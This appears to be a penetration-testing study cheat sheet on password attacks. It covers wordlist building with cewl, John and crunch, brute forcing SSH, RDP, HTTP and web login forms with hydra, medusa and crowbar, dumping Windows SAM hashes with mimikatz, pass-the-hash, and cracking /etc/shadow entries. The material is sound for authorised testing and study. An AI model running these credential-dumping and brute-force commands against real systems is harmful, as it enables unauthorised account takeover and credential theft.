## Wordlists
Wordlists save time at the expense of coverage: instead of trying every combination, try the most likely passwords first.
Default wordlist location: `/usr/share/wordlists`
### Standard Wordlists
To create a custom password list from a target's own website with `cewl`:
```bash
cewl --help | less
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt # scrape the site for words of at least 6 chars and write them to a file
```
Use **John** rules to mutate the wordlist into different password styles:
```bash
sudo nano /etc/john/john.conf
# find the [List.Rules:Wordlist] section and add rules there,
# e.g. append two digits to the end of each word:
# $[0-9]$[0-9]
john --wordlist=megacorp-cewl.txt --rules --stdout > mutate.txt
```
### Brute Force Wordlists
Test every password combination.
#### Generate brute-force passwords in a given pattern with `crunch` to save time
| Placeholder | Character Translation |
| ----------- | ---------------------------------- |
| @ | Lower case alpha characters |
| , | Uppercase alpha characters |
| % | Numeric characters |
| ^ | Special characters including space |
```bash
crunch 8 8 -t ,@@^^%%% # generate passwords with min and max length 8; -t specifies the pattern
crunch 4 6 0123456789ABCDEF -o crunch.txt # use only the given characters
# /usr/share/crunch/charset.lst holds predefined character sets
crunch 4 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch.txt # pick a set, e.g. mixalpha for upper/lower letters
```
## Common Network Service Attack Methods
### HTTP htaccess Attack with Medusa
```bash
medusa -h <HOST IP> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
```
### Remote Desktop Protocol Attack with Crowbar
```bash
sudo apt install crowbar
crowbar -b rdp -s <HOST IP>/32 -u admin -C <password file> -n 1 # -b protocol, -s target in CIDR notation, -n number of threads
```
### SSH Attack with THC-Hydra
```bash
# -l target username
# -P wordlist
# protocol://IP  protocol and IP address
hydra -l kali -P <pwd file> ssh://<IP>
```
### HTTP POST Attack with THC-Hydra
```bash
hydra -U http-form-post | less # show the module's extra arguments for a form
# read the web page source first to understand how the form is built
hydra -l admin -P <pwd file> -vV -f <IP> http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN"
# -f: stop after the first success
```
## Leveraging Password Hashes
### Retrieving Password Hashes
```bash
hashid "<hash>" # identify the hash type
```
Use mimikatz to retrieve password hashes from Windows:
```powershell
# Within mimikatz
privilege::debug
token::elevate # elevate from a high-integrity token to SYSTEM
lsadump::sam # dump the local SAM hashes
```
### Passing the Hash in Windows
Use the hash to authenticate instead of the clear-text password. Windows does not salt its password hashes, so the hash for a given password is static: if two machines have the same username and password, the hash dumped from one machine can be used to log in to the other.
```bash
pth-winexe -U <USERNAME>%<HASH> //<IP> cmd
```
### Password Cracking
The process of recovering the clear text of a password given its hashed form.
```bash
# Windows hashes
john hash.txt --format=NT
john --wordlist=<word list> hash.txt --format=NT
john --rules --wordlist=<word list> hash.txt --format=NT
# Linux cracking: combine the user's passwd and shadow entries, then crack
grep <username> /etc/passwd > pwd-file.txt
sudo grep <username> /etc/shadow > shadow-file.txt
unshadow pwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
# --fork=N to run N processes (needed explicitly on older versions, default in newer ones)
# --node=N/M to distribute the load across M computers
```
John is limited by CPU speed; [hashcat](https://hashcat.net) uses the GPU instead (see the [hashcat wiki](https://hashcat.net/wiki/)).